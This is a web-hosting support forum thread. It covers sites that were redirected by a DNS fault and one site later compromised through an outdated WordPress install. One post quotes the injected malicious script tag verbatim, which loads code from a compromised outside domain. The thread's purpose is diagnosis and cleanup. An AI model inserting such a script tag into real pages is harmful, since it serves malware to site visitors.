My blog just got hacked

Status
Not open for further replies.

moviefa2

New Member
Messages
6
Reaction score
0
Points
1
I wonder if this has happened to anybody else tonight. It just happened this evening; I was on it not 2 hours ago when it was a movie blog, and now it is a sporting goods site all of a sudden. Frankly I don't what to do other than report this.

http://moviefan.pcriot.com/
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
I'm not sure what caused that but it doesn't look like a hack so much as something malfunctioning; the account itself wasn't modified, but an entry on our nameserver was incorrect and was pointing to the wrong IP (but only for this specific domain). I've re-saved the DNS settings and confirmed that it did update through OpenDNS, but depending on your DNS provider (usually your ISP) it may take some time for the change to propagate. You may be able to speed up the process by running "ipconfig /flushdns" in a Windows command prompt and then restart the browser.
 

ohorosh211

New Member
Messages
9
Reaction score
0
Points
1
Looks like the same issue with me kiwi.pcriot.com. Site IP changed, site content changed but I can access CPanel. Please help!!!
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
Should be fixed as well, I've notified an admin that it's happening more than once so we can work on identifying exactly what's causing it.
 

moviefa2

New Member
Messages
6
Reaction score
0
Points
1
Okay, now this is different; my site just goes to an empty folder like nothing is there. I logged into cPanel and checked and the files are there. Are you all working on the server or has the ip been redirected again?
 

leafypiggy

Manager of Pens and Office Supplies
Staff member
Messages
3,819
Reaction score
163
Points
63
Hi moviefa2:

We're working on a permanent fix for this. I apologize for the downtime. :'( I'll update you when I have more info.
 

ohorosh211

New Member
Messages
9
Reaction score
0
Points
1
Hi again, just for information - my kiwi.pcriot.com also is showing empty folder now
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
Fixed as above; we're still working on implementing the permanent fix so if it would change back, let us know and we'll keep repairing it until it's finally fixed fully :)
 

moviefa2

New Member
Messages
6
Reaction score
0
Points
1
Mine is working fine too. I'll update you if that changes. Thank you for your help.
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
Should be fixed depending on how fast DNS propagates (see above).
 

ohorosh211

New Member
Messages
9
Reaction score
0
Points
1
Again problem with kiwi.pcriot.com. But this time it's different, site is really hacked. Firefox browser reported something like "This site may harm your computer" about my site. I checked files and found that every html file is infected with line
<script type="text/javascript" src="http://www.pentagonlondon.co.uk/wp-admin/6czhkn3x.php?id=15074425"></script>
All infected files have modification time Sep 5,2014 12:47 AM I have closed site with password till problem is resolved.
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
That particular compromise looks to be started from the demo_oleg/wp6 Wordpress install, which is running version 3.8 and is 9 months out of date (3.8 launched last December). With compromises of this nature, you would be responsible for cleanup as account security is the user's responsibility, and if we attempt cleanup there's a very good chance we would actually damage the site further. With us only having full-server backups, we wouldn't be able to restore an individual website from them either, so if we were to make things worse by accident we wouldn't be able to fix it.

If you have backups, I would recommend removing everything on the account and starting from a backup that wasn't infected, then immediately update all software to their latest versions. If no backups are available, then I would instead remove all files and start from fresh, vendor supplied files that are up-to-date only, as any outdated software with known exploits is a target for hackers as soon as they discover the location of it.
 

ohorosh211

New Member
Messages
9
Reaction score
0
Points
1
Thank you for your reply. Fortunately I have backup and already restored files from it. I removed current WordPress installation which is used only for part of the site and will reinstall it later from scratch.
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
Should be fixed, same directions as above (need to wait for DNS to propagate, blah blah blah blah blah). Admins know what caused it and I believe we have a solution in place to help prevent it in the future (if not, I know they're working on it, cause I will nag them incessantly until they tell me it's done :) ).
 
Status
Not open for further replies.
Top